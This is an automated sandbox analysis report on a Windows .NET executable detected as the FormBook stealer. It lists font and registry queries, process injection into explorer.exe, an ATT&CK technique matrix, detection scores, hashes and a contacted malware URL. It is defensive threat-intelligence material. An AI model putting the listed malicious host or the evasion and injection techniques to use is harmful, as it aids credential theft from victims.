          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Fp4grWelSC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 11_2_011E3F80
          Source: C:\Windows\SysWOW64\cmd.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, 11_2_011D96A0
          Source: C:\Windows\SysWOW64\cmd.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc, 11_2_011D5AEF
          Source: C:\Users\user\Desktop\Fp4grWelSC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 11_2_011E7513 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 11_2_011E7513
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 11_2_011D443C GetVersion, 11_2_011D443C
          Source: explorer.exe, 00000016.00000000.876265655.0000000005E6A000.00000004.00000001.sdmp, explorer.exe, 00000016.00000003.891009930.0000000005E6A000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Windows Defender\MSASCui.exe

          Stealing of Sensitive Information:

          Yara detected FormBook

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
          |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
          | Valid Accounts 1 | Shared Modules 1 | Valid Accounts 1 | Valid Accounts 1 | Masquerading 1 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
          | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Access Token Manipulation 1 | Valid Accounts 1 | LSASS Memory | Query Registry 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
          | Domain Accounts | At (Linux) | Logon Script (Windows) | Process Injection 512 | Access Token Manipulation 1 | Security Account Manager | Security Software Discovery 261 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
          | Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Disable or Modify Tools 1 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud |
          | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion 41 | LSA Secrets | Virtualization/Sandbox Evasion 41 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
          | Replication Through Removable Media | Launchd | Rc.common | Rc.common | Process Injection 512 | Cached Domain Credentials | File and Directory Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
          | External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 2 | DCSync | System Information Discovery 125 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
          | Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 13 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
          | Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | File Deletion 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction |

          Behavior Graph

          Behavior Graph ID: 552852, Sample: Fp4grWelSC.exe, Start date: 13/01/2022, Architecture: WINDOWS, Score: 100
          [Graph image not reproduced. Process chain shown: Fp4grWelSC.exe -> Fp4grWelSC.exe -> explorer.exe (injected) -> cmd.exe and autochk.exe; cmd.exe -> cmd.exe -> conhost.exe, plus two further explorer.exe processes started by cmd.exe. Dropped file: C:\Users\user\AppData\...\Fp4grWelSC.exe.log]


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | Fp4grWelSC.exe | 30% | Virustotal | |
          | Fp4grWelSC.exe | 39% | ReversingLabs | Win32.Trojan.Generic |
          | Fp4grWelSC.exe | 100% | Joe Sandbox ML | |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | 4.0.Fp4grWelSC.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
          | 4.0.Fp4grWelSC.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
          | 4.2.Fp4grWelSC.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
          | 4.0.Fp4grWelSC.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |

          Domains

          No Antivirus matches

          URLs

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | http://www.galapagosdesign.com/ | 0% | URL Reputation | safe |
          | http://www.fontbureau.comF | 0% | URL Reputation | safe |
          | http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
          | http://www.fontbureau.comldW | 0% | Avira URL Cloud | safe |
          | http://en.wV | 0% | Avira URL Cloud | safe |
          | http://www.tiro.com | 0% | URL Reputation | safe |
          | http://www.goodfont.co.kr | 0% | URL Reputation | safe |
          | http://www.carterandcone.coml | 0% | URL Reputation | safe |
          | http://www.sajatypeworks.com | 0% | URL Reputation | safe |
          | http://www.typography.netD | 0% | URL Reputation | safe |
          | http://www.fontbureau.comas | 0% | Avira URL Cloud | safe |
          | http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
          | http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
          | http://fontfabrik.com | 0% | URL Reputation | safe |
          | http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
          | http://www.zhongyicts.com.cnew | 0% | Avira URL Cloud | safe |
          | www.safetyeats.asia/pnug/ | 100% | Avira URL Cloud | malware |
          | http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
          | http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
          | http://www.sandoll.co.kr | 0% | URL Reputation | safe |
          | http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
          | http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
          | http://www.carterandcone.como. | 0% | URL Reputation | safe |
          | http://www.sakkal.com | 0% | URL Reputation | safe |
          | http://crl.v | 0% | URL Reputation | safe |

          Domains and IPs

          Contacted Domains

          No contacted domains info

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          www.safetyeats.asia/pnug/ | true | Avira URL Cloud: malware | low

          URLs from Memory and Binaries


                                  Contacted IPs

                                  No contacted IP infos

                                  General Information

                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                  Analysis ID:552852
                                  Start date:13.01.2022
                                  Start time:20:21:28
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 12m 29s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Sample file name:Fp4grWelSC.exe
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                  Number of analysed new started processes analysed:32
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:1
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@10/1@0/0
                                  EGA Information:
                                  • Successful, ratio: 66.7%
                                  HDC Information:
                                  • Successful, ratio: 23.7% (good quality ratio 21.1%)
                                  • Quality average: 67.3%
                                  • Quality standard deviation: 33.4%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 30
                                  • Number of non-executed functions: 162
                                  Cookbook Comments:
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Found application associated with file extension: .exe
                                  Warnings:
                                  • Exclude process from analysis (whitelisted): SearchUI.exe, BackgroundTransferHost.exe, WerFault.exe, ShellExperienceHost.exe, backgroundTaskHost.exe, svchost.exe, mobsync.exe, wuapihost.exe
                                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, www.bing.com, store-images.s-microsoft.com, s-ring.msedge.net, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, teams-ring.msedge.net, arc.msn.com, t-ring.msedge.net
                                  • Execution Graph export aborted for target cmd.exe, PID 7036 because there are no executed functions
                                  • Not all processes were analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtCreateFile calls found.
                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                  • Report size getting too big, too many NtEnumerateValueKey calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                  Simulations

                                  Behavior and APIs

                                  Time | Type | Description
                                  20:22:31 | API Interceptor | 1x Sleep call for process: Fp4grWelSC.exe modified
                                  20:23:43 | API Interceptor | 172x Sleep call for process: explorer.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  No context

                                  Domains

                                  No context

                                  ASN

                                  No context

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Fp4grWelSC.exe.log
                                  Process:C:\Users\user\Desktop\Fp4grWelSC.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1310
                                  Entropy (8bit):5.345651901398759
                                  Encrypted:false
                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x847mE4P:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzQ
                                  MD5:A9EFF9253CAF99EC8665E41D736DDAED
                                  SHA1:D95BB4ABC856D774DA4602A59DE252B4BF560530
                                  SHA-256:DBC637B33F1F3CD1AB40AFED23F94C4571CA43621EBB52C5DC267DBDC52D4783
                                  SHA-512:96B67A84B750589BDB758224641065919F34BBF02BB286B9F5D566B48965A0E38FB88308B61351A6E11C46B76BFEC370FBC8B978A9F0F07A847567172D5CA5F3
                                  Malicious:true
                                  Reputation:moderate, very likely benign file
                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):7.294974785296935
                                  TrID:
                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                  • DOS Executable Generic (2002/1) 0.01%
                                  File name:Fp4grWelSC.exe
                                  File size:595968
                                  MD5:0e99d13aafcc5e8fadc45d8b85336d9b
                                  SHA1:6573c9dd229e50981aa24128ad02a07e99805369
                                  SHA256:a15402c5f869a1c02421742c27dd71c2448bb037d391a6bf130be06b2f976e2f
                                  SHA512:d2c22cff7ad0e8ea73b4d6a82f732d5d4f10033598040d545f00711d5a9c10c2d78e5c5aa17c8cacf9434e361f4b947a33c4849e800e2f3df7b73245ecd69d5a
                                  SSDEEP:12288:IK777777777777YPLgd5c/MhOk1nFhLuxbW54Tz/9KOgKTZZtqIQ2x:IK777777777777YMd5cmOksxOeBEQjD
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....%.a..............0..B..........^a... ........@.. ....................................@................................

                                  File Icon

                                  Icon Hash:d2fafaf2f2dadac4

                                  Static PE Info

                                  General

                                  Entrypoint:0x46615e
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                  Time Stamp:0x61E025D6 [Thu Jan 13 13:15:02 2022 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:v4.0.30319
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                  Entrypoint Preview

                                  Instruction
                                  jmp dword ptr [00402000h]
                                  add byte ptr [eax], al (repeated 97 times)

                                  Data Directories

                                  Name | Virtual Address | Virtual Size | Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6610c | 0x4f | .text
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x68000 | 0x2d104 | .rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x96000 | 0xc | .reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                  Sections

                                  Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                  .text | 0x2000 | 0x64164 | 0x64200 | False | 0.881544553683 | data | 7.74639201184 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                  .rsrc | 0x68000 | 0x2d104 | 0x2d200 | False | 0.320323320637 | data | 5.73852496041 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc | 0x96000 | 0xc | 0x200 | False | 0.044921875 | data | 0.0980041756627 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                  Resources

                                  Name | RVA | Size | Type | Language | Country
                                  RT_ICON | 0x68280 | 0x5aab | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | |
                                  RT_ICON | 0x6dd2c | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | |
                                  RT_ICON | 0x7e554 | 0x94a8 | data | |
                                  RT_ICON | 0x879fc | 0x5488 | data | |
                                  RT_ICON | 0x8ce84 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 240, next used block 4278386688 | |
                                  RT_ICON | 0x910ac | 0x25a8 | data | |
                                  RT_ICON | 0x93654 | 0x10a8 | data | |
                                  RT_ICON | 0x946fc | 0x468 | GLS_BINARY_LSB_FIRST | |
                                  RT_GROUP_ICON | 0x94b64 | 0x76 | data | |
                                  RT_VERSION | 0x94bdc | 0x33c | data | |
                                  RT_MANIFEST | 0x94f18 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                  Imports

                                  DLL | Import
                                  mscoree.dll | _CorExeMain

                                  Version Infos

                                  Description | Data
                                  Translation | 0x0000 0x04b0
                                  LegalCopyright | Copyright 2015
                                  Assembly Version | 1.0.0.0
                                  InternalName | AppDomainManag.exe
                                  FileVersion | 1.0.0.0
                                  CompanyName |
                                  LegalTrademarks |
                                  Comments |
                                  ProductName | ram machine
                                  ProductVersion | 1.0.0.0
                                  FileDescription | ram machine
                                  OriginalFilename | AppDomainManag.exe

                                  Network Behavior

                                  No network behavior found


                                  System Behavior

                                  General

                                  Start time:20:22:21
                                  Start date:13/01/2022
                                  Path:C:\Users\user\Desktop\Fp4grWelSC.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\Fp4grWelSC.exe"
                                  Imagebase:0x370000
                                  File size:595968 bytes
                                  MD5 hash:0E99D13AAFCC5E8FADC45D8B85336D9B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Yara matches:
                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.689155208.000000000288A000.00000004.00000001.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.689464774.0000000003849000.00000004.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.689464774.0000000003849000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.689464774.0000000003849000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.689085196.0000000002841000.00000004.00000001.sdmp, Author: Joe Security
                                  Reputation:low

                                  General

                                  Start time:20:22:32
                                  Start date:13/01/2022
                                  Path:C:\Users\user\Desktop\Fp4grWelSC.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\Desktop\Fp4grWelSC.exe
                                  Imagebase:0xab0000
                                  File size:595968 bytes
                                  MD5 hash:0E99D13AAFCC5E8FADC45D8B85336D9B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.686284909.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.686284909.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.686284909.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.686745373.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.686745373.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.686745373.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.764098779.0000000001080000.00000040.00020000.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.764098779.0000000001080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.764098779.0000000001080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.763833040.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
